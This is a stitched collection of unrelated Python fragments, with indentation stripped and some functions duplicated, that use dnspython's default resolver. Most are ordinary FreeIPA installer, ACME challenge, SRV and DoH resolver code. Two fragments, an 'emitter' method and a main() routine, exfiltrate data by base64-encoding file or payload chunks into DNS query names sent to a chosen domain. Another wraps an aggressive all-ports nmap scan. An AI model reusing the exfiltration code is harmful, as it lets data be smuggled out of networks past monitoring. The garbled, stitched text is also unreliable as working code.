def read_dns_forwarders():
addrs = []
if ipautil.user_input("Do you want to configure DNS forwarders?", True):
print("Following DNS servers are configured in /etc/resolv.conf: %s" %
", ".join(resolver.get_default_resolver().nameservers))
if ipautil.user_input("Do you want to configure these servers as DNS "
"forwarders?", True):
addrs = resolver.default_resolver.nameservers[:]
print("All DNS servers from /etc/resolv.conf were added. You can "
"enter additional addresses now:")
while True:
ip = ipautil.user_input("Enter an IP address for a DNS forwarder, "
"or press Enter to skip", allow_empty=True)
if not ip:
break
try:
ip_parsed = ipautil.CheckedIPAddress(ip, parse_netmask=False)
except Exception as e:
print("Error: Invalid IP Address %s: %s" % (ip, e))
print("DNS forwarder %s not added." % ip)
continue
print("DNS forwarder %s added. You may add another." % ip)
addrs.append(str(ip_parsed))
if not addrs:
print("No DNS forwarders configured")
return addrs
def get_master_ns(name, server=resolver.get_default_resolver().nameservers[0]):
try:
response = resolver.resolve(name, "SOA")
return response.response.answer[0][0].mname.to_text()
except resolver.NoAnswer:
try:
server_name = gethostbyaddr(server)[0]
message, address = query_data(name, server_name, "SOA")
response = query.udp(message, address)
return response.authority[0].to_rdataset()[0].mname.to_text()
except:
return False
except:
return False
def check_one_challenge(challenge: str, token: Optional[str]) -> bool:
resolver = get_default_resolver()
try:
answers = resolver.query(challenge, "TXT")
except (NXDOMAIN, NoAnswer):
print(f"TXT {challenge} does not exist.")
return False
except Timeout as e:
print(f"Timeout while trying to check TXT {challenge}: {e}")
return False
else:
print(f"TXT {challenge} exists.")
if token:
validation_answers = [
rdata for rdata in answers for txt_string in rdata.strings
if txt_string.decode("utf-8") == token
]
if not validation_answers:
print(f"TXT {challenge} does not have the expected token value.")
return False
print(f"TXT {challenge} has the expected token value.")
return True
def read_dns_forwarders():
addrs = []
if ipautil.user_input("Do you want to configure DNS forwarders?", True):
print("Following DNS servers are configured in /etc/resolv.conf: %s" %
", ".join(resolver.get_default_resolver().nameservers))
if ipautil.user_input("Do you want to configure these servers as DNS "
"forwarders?", True):
addrs = resolver.default_resolver.nameservers[:]
print("All DNS servers from /etc/resolv.conf were added. You can "
"enter additional addresses now:")
while True:
ip = ipautil.user_input("Enter an IP address for a DNS forwarder, "
"or press Enter to skip", allow_empty=True)
if not ip:
break
try:
ip_parsed = ipautil.CheckedIPAddress(ip, parse_netmask=False)
except Exception as e:
print("Error: Invalid IP Address %s: %s" % (ip, e))
print("DNS forwarder %s not added." % ip)
continue
print("DNS forwarder %s added. You may add another." % ip)
addrs.append(str(ip_parsed))
if not addrs:
print("No DNS forwarders configured")
return addrs
def get_ip_addresses(self):
"""
Get the IP Addresses from extracted domain names
:return: a list of IP addresses (as strings)
"""
ips = []
solver = None
if self.dns_servers is None:
solver = resolver.get_default_resolver()
else:
solver = resolver.Resolver(configure=False)
solver.nameservers = self.dns_servers
for domain in self.domains:
try:
ans = solver.query(domain, 'A')
except (resolver.NoAnswer, resolver.NXDOMAIN):
print >> sys.stderr, "this domain doesn't exist: " + domain
exit(2)
except resolver.NoNameservers:
print >> sys.stderr, "unable to do a dns query, please check your internet connection"
exit(3)
for a in ans:
ips.append((domain, str(a)))
return ips
def __init__(self, provider='abuse-contacts.abusix.zone'):
'''
Init
:param provider: Abuse contact lookup provider
:type provider: string
'''
self.set_provider(provider)
self.resolver = resolver.get_default_resolver()
def __init__(self, provider="abuse-contacts.abusix.org"):
"""
Init
:param provider: Abuse contact lookup provider
:type provider: string
"""
self.set_provider(provider)
self.resolver = resolver.get_default_resolver()
def _wait_for_txt_record(self,
nameserver: str,
min_hits: int = 2,
attempts: int = 12) -> None:
# This method is expected to be run in an executor.
domain = self.txt_record_name()
hits = 0
LOG.info("Waiting for TXT Record {}: {} Attempts".format(
domain, attempts))
for i in range(attempts):
time.sleep(5)
# (1) Query for the DNS Record (Answer)
resolver = get_default_resolver()
resolver.nameservers = [
nameserver,
]
try:
query = resolver.query(domain, 'TXT')
answers = query.response.answer
except (NoAnswer, NXDOMAIN):
LOG.debug("TXT Record {} Not Found: Attempt {}/{}".format(
domain, i + 1, attempts))
continue
# (2) Check Answer Content
for a in answers:
if any(self.txt_record_contents() in str(r) for r in a.items):
LOG.debug("Valid TXT Record {} Found on Attempt {}".format(
domain, i + 1))
hits += 1
LOG.debug("Number of Hits: {}/{}".format(hits, min_hits))
if hits >= min_hits:
return # Minimum Number of Hits Found
else:
LOG.debug("Invalid TXT Record {} Found on "
"Attempt {}/{}".format(domain, i + 1, attempts))
else:
if not hits:
msg = "Failed to Find Valid Record for {}".format(domain)
LOG.error(msg)
raise ChallengeFailure(msg)
else:
msg = "Record {} Only Found {} Times But Required {}".format(
domain, hits, min_hits)
LOG.error(msg)
raise ChallengeFailure(msg)
def __init__(self, provider='abuse-contacts.abusix.org'):
'''
Init
:param provider: Abuse contact lookup provider
:type provider: string
'''
self.set_provider(provider)
self.resolver = resolver.get_default_resolver()
def resolve(self, message: Message) -> Message:
maximum = 4
timeout = 0.4
response_message = 0
if self.name_server == 'internal':
self.name_server = resolver.get_default_resolver().nameservers[0]
done = False
tests = 0
while not done and tests < maximum:
try:
response_message = query.udp(message, self.name_server, timeout=timeout)
done = True
except exception.Timeout:
tests += 1
return response_message
def _query_srv_records(fqdn):
"""Query DNS for the SRV records of the fully-qualified domain name
specified.
:param str fqdn: The fully-qualified domain name to query
:rtype: dns.resolver.Answer
:raises: SRVQueryFailure
"""
try:
s = resolver.get_default_resolver()
s.nameservers = ['8.8.8.8']
return s.query(fqdn, 'SRV')
except (resolver.NoAnswer, resolver.NoNameservers, resolver.NotAbsolute,
resolver.NoRootSOA, resolver.NXDOMAIN) as error:
LOGGER.error('Error querying SRV for %s: %r', fqdn, error)
raise SRVQueryFailure(error.__class__.__name__)
def resolve_canonical_challenge_name(name: str) -> str:
resolver = get_default_resolver()
current_name = name
visited = [current_name]
while True:
try:
answer = resolver.resolve(current_name, rdtype=RdataType.CNAME)
current_name = str(answer[0].target)
if current_name in visited:
resolution_map = " -> ".join([*visited, current_name])
raise ValueError(
f"Error, CNAME resolution for {current_name} ended in an infinite loop!\n"
f"{resolution_map}")
visited.append(current_name)
except (NXDOMAIN, NoAnswer):
# No more CNAME in the chain, we have the final canonical_name
return current_name
def resolve(self, message: Message) -> Message:
logger = logging.getLogger("doh-server")
maximum = 4
timeout = 0.4
response_message = 0
if self.name_server == "internal":
self.name_server = resolver.get_default_resolver().nameservers[0]
done = False
tests = 0
logger.debug("Resolver used: " + str(self.name_server))
while not done and tests < maximum:
try:
response_message = query.udp(message,
self.name_server,
timeout=timeout)
done = True
except exception.Timeout:
tests += 1
return response_message
def emitter(self):
try:
if self.PROPERTIES['resolvers']['Value']:
nameservers = [
x.strip()
for x in self.PROPERTIES['resolvers']['Value'].split(',')
]
nameservers = self.PROPERTIES['resolvers']['Value'].split(',')
else:
nameservers = get_default_resolver().nameservers
for payload in self.encoder(self.payload):
try:
if self.PROPERTIES['subdomain']['Value']:
dnsname = '%s.%s.%s.' % (
self.dnsb64escape(payload),
self.PROPERTIES['subdomain']['Value'],
self.PROPERTIES['domain']['Value'])
else:
dnsname = '%s.%s.' % (self.dnsb64escape(
payload), self.PROPERTIES['domain']['Value'])
print nameservers
for ns in nameservers:
r = Resolver()
r.lifetime = 1
print ns, dnsname
r.nameservers = [ns]
try:
r.query(dnsname, 'A', raise_on_no_answer=False)
except Timeout:
pass # Timed out, that's fine
except Exception as e:
self.logger.error('Exception in %s: %s' %
(self.__class__.__name__, e))
pass
except Exception as e:
raise
return True
def main():
with open(FILE, 'r') as f:
contents = f.read()
lines = [contents[i:i + STEP] for i in range(0, len(contents), STEP)]
encoded = [
base64.urlsafe_b64encode(bytes(l, 'utf-8')).decode('utf-8')
for l in lines
]
resolver = res.get_default_resolver()
count = 0
for i in range(0, len(encoded), 1):
url = '.'.join([str(count), encoded[i], UUID])
count += 1
try:
resolver.query(url)
except:
pass
try:
resolver.query('.'.join([str(count), 'done', UUID]))
except:
pass
def __init__(self,
service,
domain,
protocol="tcp",
trusted=None,
resolver=None,
swallow_errors=True):
"""
Will return an object that will be able to iterate over the results of
performing a DNS Query for the SRV records for the requested service.
The iterable object will return items based on Priority first, then by
Weight in each Priority group.
Since there is randomness involved, iterating over the object multiple
times will never result in the same order twice.
Args:
service (str): The service to lookup SRV records for
domain (str): The domain the service is associated with
protocol (str): Either `tcp` and `udp`, defaults to `tcp`
trusted (re): A Regular Expression used to ensure records
returned are from a trusted domain
resolver (obj): An instance of DNS Python Resolver to point
to a custom resolver for DNS queries.
swallow_errors (bool): Catch exceptions and swallow them,
default is True
Example:
RobinSRV("jabber", "gmail")
Will result in a RobinSRV object for `_jabber._tcp.gmail.com`.
"""
self.service = "_{}._{}.{}".format(service, protocol, domain)
self.trusted = trusted
self.resolver = resolver if resolver else get_default_resolver()
self.swallow_errors = swallow_errors
self.ttl = datetime(1, 1, 1)
self.groups = []
self.log = logging.getLogger(__name__)
def get_nameservers(force_update=False):
if force_update:
resolver.default_resolver = resolver.Resolver()
return resolver.get_default_resolver().nameservers
cmd = ArgumentParser(description="Probes a DNS server by requesting the SOA record")
cmd.add_argument("-name", help="Name to resolve. Default is the local host's domain", default=getfqdn().split(".", 1)[-1])
cmd.add_argument("-servers", help="Space separated list of name servers. Default is 127.0.0.1", default="127.0.0.1")
cmd.add_argument("-v", help="Verbose messaging", action="store_true", default=False)
cmd.add_argument("-version", help="Print version and exit", action="store_true", default=False)
args = cmd.parse_args()
if args.version:
print(_FILE_VER)
sys.exit()
args.servers = args.servers.split()
vmsg = verbose(args.v)
resolver.get_default_resolver().nameservers = args.servers
resolver.get_default_resolver().lifetime = DNS_TIMEOUT
vmsg("Resolving {}".format(args.name))
vmsg("Using name servers {}".format(resolver.get_default_resolver().nameservers))
try:
resolver.query(args.name, rdatatype.SOA)
except exception.Timeout:
print(DNS_TIMEOUT_MESSAGE, end="")
except resolver.NXDOMAIN:
print(DNS_NOTFOUND_MESSAGE, end="")
except exception.DNSException:
print(DNS_ERROR_MESSAGE, end="")
else:
print(OK_MESSAGE, end="")
def install_check(standalone, api, replica, options, hostname):
global ip_addresses
global reverse_zones
fstore = sysrestore.FileStore(paths.SYSRESTORE)
if not ipautil.file_exists(paths.IPA_DNS_INSTALL):
raise RuntimeError("Integrated DNS requires '%s' package" %
constants.IPA_DNS_PACKAGE_NAME)
# when installing first DNS instance we need to check zone overlap
if replica or standalone:
already_enabled = api.Command.dns_is_enabled()['result']
else:
already_enabled = False
if not already_enabled:
domain = dnsutil.DNSName(util.normalize_zone(api.env.domain))
print("Checking DNS domain %s, please wait ..." % domain)
try:
dnsutil.check_zone_overlap(domain, raise_on_error=False)
except ValueError as e:
if options.force or options.allow_zone_overlap:
root_logger.warning("%s Please make sure that the domain is "
"properly delegated to this IPA server.",
e.message)
else:
raise e
for reverse_zone in options.reverse_zones:
try:
dnsutil.check_zone_overlap(reverse_zone)
except ValueError as e:
if options.force or options.allow_zone_overlap:
root_logger.warning(e.message)
else:
raise e
if standalone:
print("==============================================================================")
print("This program will setup DNS for the FreeIPA Server.")
print("")
print("This includes:")
print(" * Configure DNS (bind)")
print(" * Configure SoftHSM (required by DNSSEC)")
print(" * Configure ipa-dnskeysyncd (required by DNSSEC)")
if options.dnssec_master:
print(" * Configure ipa-ods-exporter (required by DNSSEC key master)")
print(" * Configure OpenDNSSEC (required by DNSSEC key master)")
print(" * Generate DNSSEC master key (required by DNSSEC key master)")
elif options.disable_dnssec_master:
print(" * Unconfigure ipa-ods-exporter")
print(" * Unconfigure OpenDNSSEC")
print("")
print("No new zones will be signed without DNSSEC key master IPA server.")
print("")
print(("Please copy file from %s after uninstallation. This file is needed "
"on new DNSSEC key " % paths.IPA_KASP_DB_BACKUP))
print("master server")
print("")
print("NOTE: DNSSEC zone signing is not enabled by default")
print("")
if options.dnssec_master:
print("Plan carefully, replacing DNSSEC key master is not recommended")
print("")
print("")
print("To accept the default shown in brackets, press the Enter key.")
print("")
if (options.dnssec_master and not options.unattended and not
ipautil.user_input(
"Do you want to setup this IPA server as DNSSEC key master?",
False)):
sys.exit("Aborted")
elif (options.disable_dnssec_master and not options.unattended and not
ipautil.user_input(
"Do you want to disable current DNSSEC key master?",
False)):
sys.exit("Aborted")
if options.disable_dnssec_master:
_is_master()
if options.disable_dnssec_master or options.dnssec_master:
dnssec_zones = _find_dnssec_enabled_zones(api.Backend.ldap2)
if options.disable_dnssec_master:
if dnssec_zones and not options.force:
raise RuntimeError(
"Cannot disable DNSSEC key master, DNSSEC signing is still "
"enabled for following zone(s):\n"
"%s\n"
"It is possible to move DNSSEC key master role to a different "
"server by using --force option to skip this check.\n\n"
"WARNING: You have to immediatelly copy kasp.db file to a new "
"server and run command 'ipa-dns-install --dnssec-master "
"--kasp-db'.\n"
"Your DNS zones will become unavailable if you "
"do not reinstall the DNSSEC key master role immediatelly." %
", ".join([str(zone) for zone in dnssec_zones]))
elif options.dnssec_master:
ods = opendnssecinstance.OpenDNSSECInstance(fstore)
ods.realm = api.env.realm
dnssec_masters = ods.get_masters()
# we can reinstall current server if it is dnssec master
if dnssec_masters and api.env.host not in dnssec_masters:
print("DNSSEC key master(s):", u','.join(dnssec_masters))
raise ScriptError(
"Only one DNSSEC key master is supported in current version.")
if options.kasp_db_file:
dnskeysyncd = services.service('ipa-dnskeysyncd')
if not dnskeysyncd.is_installed():
raise RuntimeError("ipa-dnskeysyncd is not configured on this "
"server, you cannot reuse OpenDNSSEC "
"database (kasp.db file)")
# check if replica can be the DNSSEC master
cmd = [paths.IPA_DNSKEYSYNCD_REPLICA]
environment = {
"SOFTHSM2_CONF": paths.DNSSEC_SOFTHSM2_CONF,
}
# stop dnskeysyncd before test
dnskeysyncd_running = dnskeysyncd.is_running()
dnskeysyncd.stop()
try:
ipautil.run(cmd, env=environment,
runas=constants.ODS_USER,
suplementary_groups=[constants.NAMED_GROUP])
except CalledProcessError as e:
root_logger.debug("%s", e)
raise RuntimeError("This IPA server cannot be promoted to "
"DNSSEC master role because some keys were "
"not replicated from the original "
"DNSSEC master server")
finally:
if dnskeysyncd_running:
dnskeysyncd.start()
elif dnssec_zones and not options.force:
# some zones have --dnssec=true, make sure a user really want to
# install new database
raise RuntimeError(
"DNSSEC signing is already enabled for following zone(s): %s\n"
"Installation cannot continue without the OpenDNSSEC database "
"file from the original DNSSEC master server.\n"
"Please use option --kasp-db to specify location "
"of the kasp.db file copied from the original "
"DNSSEC master server.\n"
"WARNING: Zones will become unavailable if you do not provide "
"the original kasp.db file." %
", ".join([str(zone) for zone in dnssec_zones]))
ip_addresses = get_server_ip_address(hostname, options.unattended,
True, options.ip_addresses)
util.network_ip_address_warning(ip_addresses)
util.broadcast_ip_address_warning(ip_addresses)
if not options.forward_policy:
# user did not specify policy, derive it: default is 'first' but
# if any of local IP addresses belongs to private ranges use 'only'
options.forward_policy = 'first'
for ip in ip_addresses:
if dnsutil.inside_auto_empty_zone(dnsutil.DNSName(ip.reverse_dns)):
options.forward_policy = 'only'
root_logger.debug('IP address %s belongs to a private range, '
'using forward policy only', ip)
break
if options.no_forwarders:
options.forwarders = []
elif options.forwarders or options.auto_forwarders:
if not options.forwarders:
options.forwarders = []
if options.auto_forwarders:
options.forwarders += resolver.get_default_resolver().nameservers
elif standalone or not replica:
options.forwarders = read_dns_forwarders()
# test DNSSEC forwarders
if options.forwarders:
if (not bindinstance.check_forwarders(options.forwarders,
root_logger)
and not options.no_dnssec_validation):
options.no_dnssec_validation = True
print("WARNING: DNSSEC validation will be disabled")
root_logger.debug("will use DNS forwarders: %s\n", options.forwarders)
if not standalone:
search_reverse_zones = False
else:
search_reverse_zones = True
if not standalone and replica:
reverse_zones_unattended_check = True
else:
reverse_zones_unattended_check = options.unattended
reverse_zones = bindinstance.check_reverse_zones(
ip_addresses, options.reverse_zones, options,
reverse_zones_unattended_check, search_reverse_zones
)
if reverse_zones:
print("Using reverse zone(s) %s" % ', '.join(reverse_zones))
except:
print("Install colorama and dnspython modules using pip3")
exit()
init()
already_done = {}
ip_4 = []
ip_6 = []
maximum_recursion_depth = 20
name_servers = {
'8.8.8.8': None,
'8.8.4.4': None,
'208.67.222.222': None,
'208.67.220.220': None
}
for name_server in get_default_resolver().nameservers:
name_servers[name_server] = None
ADDITIONAL_RDCLASS = 65535
all_ids = [
'NONE', 'A', 'NS', 'MD', 'MF', 'CNAME', 'SOA', 'MB', 'MG', 'MR', 'NULL',
'WKS', 'PTR', 'HINFO', 'MINFO', 'MX', 'TXT', 'RP', 'AFSDB', 'X25', 'ISDN',
'RT', 'NSAP', 'NSAP-PTR', 'SIG', 'KEY', 'PX', 'GPOS', 'AAAA', 'LOC', 'NXT',
'SRV', 'NAPTR', 'KX', 'CERT', 'A6', 'DNAME', 'OPT', 'APL', 'DS', 'SSHFP',
'IPSECKEY', 'RRSIG', 'NSEC', 'DNSKEY', 'DHCID', 'NSEC3', 'NSEC3PARAM',
'TLSA', 'HIP', 'CDS', 'CDNSKEY', 'CSYNC', 'SPF', 'UNSPEC', 'EUI48',
'EUI64', 'TKEY', 'TSIG', 'IXFR', 'AXFR', 'MAILB', 'MAILA', 'ANY', 'URI',
'CAA', 'TA', 'DLV'
]
def execute(self):
data = dict()
ip_list = []
cname_list = []
mx_list = []
ns_list = []
# terminal_request_send_time
self.terminal_request_send_time = time.time()
self.parameters["terminal_request_send_time"] = self.terminal_request_send_time
if self.dns_server:
try:
dns_query = dns.message.make_query(qname=self.destination, rdtype=self.rdtype)
querya = dns.query.udp(dns_query, self.dns_server, timeout=self.dns_timeout)
data_ptime = querya.time * 1000
answer = querya.answer
except dns.exception.Timeout as e:
logger.exception("dns timeout exception")
return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_timeout_error()
except (resolver.NXDOMAIN, socket.gaierror) as e:
logger.exception("dns server exception")
return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_server_error()
else:
dns_servers = resolver.get_default_resolver().nameservers
if not dns_servers:
logger.error("do not have dns servers")
return DnsError(url=self.destination, parameters=self.parameters).miss_default_error()
dns_query = dns.message.make_query(qname=self.destination, rdtype=self.rdtype)
timeout_flag = 0
dns_server_flag = 0
for dns_server in dns_servers:
try:
querya = dns.query.udp(dns_query, dns_server, timeout=self.dns_timeout)
data_ptime = querya.time * 1000
answer = querya.answer
self.dns_server = dns_server
break
except dns.exception.Timeout as e:
logger.exception("dns server {} got timeout exception".format(str(dns_server)))
timeout_flag += 1
if timeout_flag + dns_server_flag == len(dns_servers):
return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_timeout_error()
except (resolver.NXDOMAIN, socket.gaierror) as e:
logger.exception("dns server {} got server exception".format(str(dns_server)))
dns_server_flag += 1
if timeout_flag + dns_server_flag == len(dns_servers):
return DnsError(url=self.destination, error=e, parameters=self.parameters).dns_server_error()
self.terminal_response_receive_time = time.time()
ipt = IpLocation(self.parameters)
for queryans in answer:
for item in queryans.items:
# A记录 又称IP指向
if item.rdtype == rdatatype.A:
ip_dict = dict()
ip = item.address
ip_dict["ip"] = ip
location = ipt.get_location(ip)
ip_dict["location"] = location
ip_list.append(ip_dict)
# CNAME 通常称别名指向
elif item.rdtype == rdatatype.CNAME:
cname_list.append(str(item.target))
# MAIL记录
elif item.rdtype == rdatatype.MX:
mx_list.append(str(item.exchange))
# NS记录
elif item.rdtype == rdatatype.NS:
ns_list.append(str(item.target))
if self.dns_method == "mx":
if mx_list:
data["mxs"] = mx_list
else:
return DnsError(url=self.destination, parameters=self.parameters).dns_query_error()
elif self.dns_method == "a":
if ip_list:
data["ips"] = ip_list
else:
return DnsError(url=self.destination, parameters=self.parameters).dns_query_error()
elif self.dns_method == "ns":
if ns_list:
data["ns"] = ns_list
else:
return DnsError(url=self.destination, parameters=self.parameters).dns_query_error()
elif self.dns_method == "cname":
if cname_list:
data["cnames"] = cname_list
else:
return DnsError(url=self.destination, parameters=self.parameters).dns_query_error()
else:
return DnsError(url=self.destination, parameters=self.parameters).dns_query_error()
data["destination"] = self.destination
data["ptime"] = data_ptime
data["dns_server"] = dict()
data["dns_server"]["ip"] = self.dns_server
data["dns_server"]["location"] = ipt.get_location(self.dns_server)
result = {
"status": 0,
"data": data,
"stamp": {
"server_request_generate_time": self.server_request_generate_time,
"terminal_request_receive_time": self.terminal_request_receive_time,
"terminal_request_send_time": self.terminal_request_send_time,
"terminal_response_receive_time": self.terminal_response_receive_time,
}
}
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description='Compare resolution performance of RDNS')
parser.add_argument('-o', '--output', default=sys.stdout, type=argparse.FileType('w'), help='output file')
parser.add_argument('-c', '--csv', default=None, type=argparse.FileType('w'), help='csv output file for detailed results')
parser.add_argument('-b', '--bind', default=':0', help='binding interface')
parser.add_argument('-n', '--names', default=1000, type=int, help='number of hostnames to use in testing')
parser.add_argument('-s', '--sanity', default=None, help='override url for the sanity list of hostnames')
parser.add_argument('-p', '--popular', default=None, help='override url for the popular list of hostnames')
parser.add_argument('-r', '--recursives', default=None, help='override url for the list of recursive dns servers')
parser.add_argument('-a', '--additional', nargs='+', default=[], help='IP addresses of additional recursive resolvers')
parser.add_argument('-i', '--inuse', action='store_true', default=False, help='include the system configured recursive resolver')
parser.add_argument('--progress', action='store_true', default=False, help='report progress updates')
args = parser.parse_args()
hostname,port = args.bind.split(':')
bind = (hostname, int(port))
source = Input(args.popular, args.sanity, args.recursives)
for additional in args.additional:
service = Service(additional)
service.recursives.append(Recursive(additional, service))
source.recursives.append(service)
if args.inuse:
service = Service('inuse')
for nameserver in dr.get_default_resolver().nameservers:
service.recursives.append(Recursive(nameserver, service))
source.recursives.append(service)
source.popular = source.popular[:args.names]
main(bind, source, args.output, args.csv, args.progress)
import re
import statistics
import string
import sys
import time
from random import randint
import click
import yaml
from dns import rdataclass, rdatatype, resolver
tlds = [
'com', 'org', 'co.uk', 'net', 'ca', 'de', 'jp', 'fr', 'au', 'us', 'at',
'ch', 'it', 'nl', 'io'
]
local_servers = list(resolver.get_default_resolver().nameservers) if len(
resolver.get_default_resolver().nameservers) > 0 else ['127.0.0.1']
def random_string(size=6, chars=string.ascii_lowercase + string.digits):
"""generate random string in a given range"""
return ''.join(random.choice(chars) for _ in range(size))
def reset_line_print(x):
"""reset the current line in a shell if interactive, else print normally"""
if sys.stdout.isatty():
print('\x1b[2K' + x, end='\r')
else:
print(x)
sys.stdout.flush()
def main():
parser = ArgumentParser()
parser.add_argument("name", type=str, help="Scan name.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-t",
"--target",
type=str,
nargs="+",
help="Target hostnames, IP addresses, networks, etc.")
group.add_argument("-iL",
"--target-list",
type=FileType("r"),
help="Input from list of hosts/networks.")
parser.add_argument("-ns",
"--nameservers",
type=str,
nargs="+",
help="Specify custom DNS servers.",
default=get_default_resolver().nameservers)
parser.add_argument(
"-d",
"--datadir",
type=str,
help="Specify custom Nmap data file location and output directory.",
default="./nmap/")
parser.add_argument("-r",
"--resume",
action="store_true",
help="Resume previous scan.")
args = parser.parse_args()
if args.target_list:
args.target_list.close()
targets = " ".join(
args.target) if args.target else f"-iL {args.target_list.name}"
output = args.name
datadir = path.abspath(args.datadir).replace("\\", "/")
if datadir[-1] != "/":
datadir += "/"
outdir = path.join(datadir, f"{output}/")
try:
makedirs(outdir)
except FileExistsError:
pass
try:
with open(path.join(datadir, "nse-args.lst")) as base:
with open(path.join(outdir, "nse-args.lst"), "w") as new:
new.write(base.read().format(datadir=datadir, outdir=outdir))
except FileNotFoundError:
with open(path.join(outdir, "nse-args.lst"), "w") as new:
new.write("newtargets\n")
blacklist = filter(
None,
map(
str.strip, """
broadcast
brute
dos
fuzzer
asn-query
ip-geolocation-*
http-google-malware
http-virustotal
http-comments-displayer
http-fetch
http-xssed
targets-*
whois-ip
http-icloud-*
""".split()))
scripts = f"all and not {' and not '.join(blacklist)}"
# stylesheet https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl
command = (f"nmap --resume {path.join(outdir, 'sCSUV-OT.xml')}"
if args.resume else " ".join(
filter(
None,
map(
str.strip, f"""
nmap {targets}
--datadir "{datadir}"
--dns-servers "{','.join(args.nameservers)}"
--traceroute --reason
-sS -sU -p1-65535 -sV --version-all -O --osscan-guess
--script "{scripts}" --script-args-file "{path.join(outdir, 'nse-args.lst')}"
--min-rate 65535 --min-hostgroup 256 --max-hostgroup 2048
--min-parallelism 256 --stats-every 1m
-oA "{path.join(outdir, 'sCSUV-OT')}"
--webxml
""".split("\n")))))
#--script-timeout 8m
#--datadir "~/nmap/" --system-dns --traceroute --reason -sS -sU -p1-65535 -sV --version-all --osscan-guess --min-rate 65536 --max-rate 67108864 --min-parallelism 256 -oA "~/nmap/179.189.95.128" --webxml --script "external and not broadcast and not brute and not dos and not fuzzer and not intrusive and not asn-query and not clamav-exec and not ip-geolocation-* and not ipidseq and not hostmap-* and not http-google-malware and not http-virustotal and not http-comments-displayer and not http-fetch and not http-vuln-cve2014-212* and not targets-* and not whois-ip" --script-args-file "~/nmap/nse-args.lst" --script-timeout 16m
#print(command)
#exit()
system(command)
def dns_resolver():
resolver = get_default_resolver()
resolver.cache = LRUCache()
return resolver
default=[],
help='IP addresses of additional recursive resolvers')
parser.add_argument(
'-i',
'--inuse',
action='store_true',
default=False,
help='include the system configured recursive resolver')
parser.add_argument('--progress',
action='store_true',
default=False,
help='report progress updates')
args = parser.parse_args()
hostname, port = args.bind.split(':')
bind = (hostname, int(port))
source = Input(args.popular, args.sanity, args.recursives)
for additional in args.additional:
service = Service(additional)
service.recursives.append(Recursive(additional, service))
source.recursives.append(service)
if args.inuse:
service = Service('inuse')
for nameserver in dr.get_default_resolver().nameservers:
service.recursives.append(Recursive(nameserver, service))
source.recursives.append(service)
source.popular = source.popular[:args.names]
main(bind, source, args.output, args.csv, args.progress)
def install_check(standalone, api, replica, options, hostname):
global ip_addresses
global reverse_zones
fstore = sysrestore.FileStore(paths.SYSRESTORE)
if not os.path.isfile(paths.IPA_DNS_INSTALL):
raise RuntimeError("Integrated DNS requires '%s' package" %
constants.IPA_DNS_PACKAGE_NAME)
# when installing first DNS instance we need to check zone overlap
if replica or standalone:
already_enabled = api.Command.dns_is_enabled()['result']
else:
already_enabled = False
if not already_enabled:
domain = dnsutil.DNSName(util.normalize_zone(api.env.domain))
print("Checking DNS domain %s, please wait ..." % domain)
try:
dnsutil.check_zone_overlap(domain, raise_on_error=False)
except ValueError as e:
if options.force or options.allow_zone_overlap:
logger.warning("%s Please make sure that the domain is "
"properly delegated to this IPA server.",
e)
else:
raise e
for reverse_zone in options.reverse_zones:
try:
dnsutil.check_zone_overlap(reverse_zone)
except ValueError as e:
if options.force or options.allow_zone_overlap:
logger.warning('%s', six.text_type(e))
else:
raise e
if standalone:
print("==============================================================================")
print("This program will setup DNS for the FreeIPA Server.")
print("")
print("This includes:")
print(" * Configure DNS (bind)")
print(" * Configure SoftHSM (required by DNSSEC)")
print(" * Configure ipa-dnskeysyncd (required by DNSSEC)")
if options.dnssec_master:
print(" * Configure ipa-ods-exporter (required by DNSSEC key master)")
print(" * Configure OpenDNSSEC (required by DNSSEC key master)")
print(" * Generate DNSSEC master key (required by DNSSEC key master)")
elif options.disable_dnssec_master:
print(" * Unconfigure ipa-ods-exporter")
print(" * Unconfigure OpenDNSSEC")
print("")
print("No new zones will be signed without DNSSEC key master IPA server.")
print("")
print(("Please copy file from %s after uninstallation. This file is needed "
"on new DNSSEC key " % paths.IPA_KASP_DB_BACKUP))
print("master server")
print("")
print("NOTE: DNSSEC zone signing is not enabled by default")
print("")
if options.dnssec_master:
print("Plan carefully, replacing DNSSEC key master is not recommended")
print("")
print("")
print("To accept the default shown in brackets, press the Enter key.")
print("")
if (options.dnssec_master and not options.unattended and not
ipautil.user_input(
"Do you want to setup this IPA server as DNSSEC key master?",
False)):
sys.exit("Aborted")
elif (options.disable_dnssec_master and not options.unattended and not
ipautil.user_input(
"Do you want to disable current DNSSEC key master?",
False)):
sys.exit("Aborted")
if options.disable_dnssec_master:
_is_master()
if options.disable_dnssec_master or options.dnssec_master:
dnssec_zones = _find_dnssec_enabled_zones(api.Backend.ldap2)
if options.disable_dnssec_master:
if dnssec_zones and not options.force:
raise RuntimeError(
"Cannot disable DNSSEC key master, DNSSEC signing is still "
"enabled for following zone(s):\n"
"%s\n"
"It is possible to move DNSSEC key master role to a different "
"server by using --force option to skip this check.\n\n"
"WARNING: You have to immediately copy kasp.db file to a new "
"server and run command 'ipa-dns-install --dnssec-master "
"--kasp-db'.\n"
"Your DNS zones will become unavailable if you "
"do not reinstall the DNSSEC key master role immediately." %
", ".join([str(zone) for zone in dnssec_zones]))
elif options.dnssec_master:
ods = opendnssecinstance.OpenDNSSECInstance(fstore)
ods.realm = api.env.realm
dnssec_masters = ods.get_masters()
# we can reinstall current server if it is dnssec master
if dnssec_masters and api.env.host not in dnssec_masters:
print("DNSSEC key master(s):", u','.join(dnssec_masters))
raise ScriptError(
"Only one DNSSEC key master is supported in current version.")
if options.kasp_db_file:
dnskeysyncd = services.service('ipa-dnskeysyncd', api)
if not dnskeysyncd.is_installed():
raise RuntimeError("ipa-dnskeysyncd is not configured on this "
"server, you cannot reuse OpenDNSSEC "
"database (kasp.db file)")
# check if replica can be the DNSSEC master
cmd = [paths.IPA_DNSKEYSYNCD_REPLICA]
environment = {
"SOFTHSM2_CONF": paths.DNSSEC_SOFTHSM2_CONF,
}
# stop dnskeysyncd before test
dnskeysyncd_running = dnskeysyncd.is_running()
dnskeysyncd.stop()
try:
ipautil.run(cmd, env=environment,
runas=constants.ODS_USER,
suplementary_groups=[constants.NAMED_GROUP])
except CalledProcessError as e:
logger.debug("%s", e)
